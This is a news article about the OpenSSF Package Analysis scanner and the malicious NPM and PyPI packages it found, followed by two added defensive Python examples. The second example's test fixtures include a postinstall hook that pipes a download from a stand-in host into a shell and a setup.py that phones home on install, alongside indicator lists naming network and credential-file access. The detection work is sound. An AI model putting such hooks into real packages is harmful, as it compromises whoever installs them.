A scanner has been published that found 200 malicious packages in NPM and PyPI

OpenSSF (Open Source Security Foundation), founded by the Linux Foundation with the aim of improving the security of open source software, has introduced the open Package Analysis project, which develops a system for analysing packages for the presence of malicious code. The project code is written in Go and is distributed under the Apache 2.0 license. An initial analysis of the NPM and PyPI repositories using the developed toolkit made it possible to identify more than 200 previously undetected malicious packages.

Most of the identified problematic packages exploit name overlaps with internal dependencies of non-public projects (dependency confusion attack) or use typosquatting techniques (registering names similar to those of popular libraries), and also run scripts that access external hosts during the installation process. According to the Package Analysis developers, most of the packages identified as problematic were probably created by security researchers taking part in bug bounty programs, since the data they sent was limited to the user name and system name, and the actions were performed openly, with no attempt to hide their behaviour.
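The two naming abuses described above (typosquatting and dependency confusion) can both be screened for with simple name comparisons. The following is an added example, not code from the OpenSSF Package Analysis project; the popular-name list, the internal package names and the public-registry snapshot are all constructed for illustration, and the edit-distance threshold is an assumption a real scanner would tune.

```python
"""Heuristic screening for typosquatting and dependency confusion.

Added example (not part of OpenSSF Package Analysis). All package name
lists below are constructed samples, not real registry data.
"""

# Constructed sample of popular names a registry scanner might compare against.
POPULAR = {"requests", "colors", "lodash", "express", "numpy"}

# Constructed names of an organisation's private (non-public) packages.
INTERNAL = {"acme-billing", "acme-auth", "utils-core"}

# Constructed snapshot of names that resolve on the public registry.
PUBLIC_REGISTRY = {"requests", "colors", "lodash", "express", "numpy",
                   "colorss", "requessts", "lodahs", "utils-core", "acme-auth"}


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein distance: insert, delete, substitute, and
    transposition of adjacent characters each cost 1. Transpositions
    matter because swapped letters are a common typosquatting trick."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def typosquat_candidates(name, popular=POPULAR, max_distance=1):
    """Popular names within `max_distance` edits of `name`, excluding an
    exact match (the genuine package is not a squat of itself)."""
    name = name.lower()
    return sorted(p for p in popular
                  if p != name and edit_distance(name, p) <= max_distance)


def scan_registry_for_typosquats(registry=PUBLIC_REGISTRY, popular=POPULAR):
    """Map every registry name that looks like a typosquat to the popular
    names it imitates. Names with no close match are omitted."""
    hits = {}
    for name in sorted(registry):
        close = typosquat_candidates(name, popular)
        if close:
            hits[name] = close
    return hits


def dependency_confusion_risks(internal=INTERNAL, public=PUBLIC_REGISTRY):
    """Internal package names that also exist on the public registry: a
    build that resolves them without an explicit private index may pull
    the public one instead (the attack the text calls dependency confusion)."""
    return sorted(internal & public)


if __name__ == "__main__":
    print("typosquat candidates:", scan_registry_for_typosquats())
    print("dependency confusion risks:", dependency_confusion_risks())
```

The distance threshold of 1 catches single-character slips and swaps; raising it widens coverage at the cost of false positives on short names, so a production scanner should weight by name length and popularity rather than use a flat cutoff.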

Packages with malicious activity included:

  • The PyPI package discordcmd, which was caught sending unusual requests to raw.githubusercontent.com, the Discord API and ipinfo.io. The package downloaded backdoor code from GitHub and installed it into the directory of the Discord Windows client, after which it started searching the file system for Discord tokens and sending them to an external Discord server controlled by the attackers.
  • The NPM package Colorss also attempted to send tokens from a Discord account to an external server.
  • The NPM package @roku-web-core/ajax - during installation it sent information about the system and launched a handler (reverse shell) that accepted external connections and executed commands.
  • The PyPI package sirri - launched a reverse shell when a specific module was imported.
  • The NPM package random-vouchercode-generator - after the library was imported, it sent a request to an external server, which returned a command and the time at which it should be run.

The Package Analysis project comes down to analysing package code for the establishment of network connections, access to files, and execution of commands. In addition, changes in the state of packages are monitored to detect malicious additions introduced into one of the releases of originally harmless software. To track the appearance of new packages in repositories and changes to previously published packages, the Package Feeds toolkit is used, which integrates with the NPM, PyPI, Go, RubyGems, Packagist, NuGet and Crates repositories.

Package Analysis consists of three basic components that can be used together or separately:

  • A scheduler that launches package analysis tasks based on data from Package Feeds.
  • An analyser that directly examines packages and evaluates their behaviour using static analysis and detection techniques. Testing is performed in an isolated environment.
  • A loader that places the test results into a BigQuery repository.
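The article describes Package Analysis as checking package code for network connections, file access and command execution, and as watching for hooks that appear between releases of an otherwise harmless package. The following added example (not the OpenSSF project's own code) shows a minimal static triage of that kind over NPM install-time lifecycle scripts and a PyPI setup.py: it classifies what each hook touches and diffs two releases of the same package to surface a newly added hook. The indicator lists, the package manifests and the domain example.invalid are all constructed for illustration.

```python
"""Static triage of install-time hooks for the behaviour classes the text
names: network access, command execution, file access; plus a
release-to-release comparison of install hooks.

Added example, not code from OpenSSF Package Analysis. All manifests and
indicator lists are constructed samples.
"""
import json

# npm lifecycle scripts that run automatically during `npm install`.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude substring indicators, grouped by behaviour class (constructed list).
INDICATORS = {
    "network": ["curl ", "wget ", "http://", "https://", "urlopen",
                "socket.connect", "requests.get", "requests.post", "fetch("],
    "exec": ["child_process", "execsync", "spawn(", "subprocess",
             "os.system", "eval(", "bash -c", "sh -c"],
    "file_access": ["readfilesync", "os.listdir", "glob.glob", "os.walk",
                    ".ssh", ".npmrc", ".pypirc"],
}


def classify(snippet: str) -> list:
    """Behaviour classes whose indicators occur in `snippet` (case-insensitive)."""
    low = snippet.lower()
    return sorted(cls for cls, needles in INDICATORS.items()
                  if any(n in low for n in needles))


def npm_install_hooks(package_json_text: str) -> dict:
    """Return {hook: command} for the scripts npm runs at install time."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {h: scripts[h] for h in NPM_INSTALL_HOOKS if h in scripts}


def triage_npm(package_json_text: str) -> dict:
    """Map each install hook to the behaviour classes its command matches."""
    return {h: classify(cmd) for h, cmd in npm_install_hooks(package_json_text).items()}


def triage_setup_py(setup_py_text: str) -> list:
    """setup.py executes during `pip install`, so the whole file is the hook."""
    return classify(setup_py_text)


def new_hooks_between(old_package_json: str, new_package_json: str) -> dict:
    """Install hooks that are new or changed in the later release: the
    release-to-release change the text says Package Analysis watches for."""
    old = npm_install_hooks(old_package_json)
    new = npm_install_hooks(new_package_json)
    return {h: cmd for h, cmd in new.items() if old.get(h) != cmd}


# Constructed manifests: a clean release and a later one with a new hook.
BENIGN_V1 = json.dumps({
    "name": "example-lib", "version": "1.0.0",
    "scripts": {"test": "jest", "build": "tsc"},
})
SUSPICIOUS_V2 = json.dumps({
    "name": "example-lib", "version": "1.0.1",
    "scripts": {
        "test": "jest", "build": "tsc",
        "postinstall": "node -e \"require('child_process')"
                       ".execSync('curl http://example.invalid/x | sh')\"",
    },
})
# Constructed setup.py that phones home during installation.
SUSPICIOUS_SETUP = """\
from setuptools import setup
import os
os.system("curl http://example.invalid/ping")
setup(name="example-pkg", version="0.1")
"""

if __name__ == "__main__":
    print("v1 hooks:", triage_npm(BENIGN_V1))
    print("v2 hooks:", triage_npm(SUSPICIOUS_V2))
    print("new in v2:", new_hooks_between(BENIGN_V1, SUSPICIOUS_V2))
    print("setup.py:", triage_setup_py(SUSPICIOUS_SETUP))
```

Substring matching is deliberately simple and is defeated by any obfuscation of the hook (encoded strings, indirect calls), which is why the project described above runs packages in an isolated environment and records what they actually do; static triage like this is useful as a cheap first filter, not as the verdict.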

source: budenet.ru
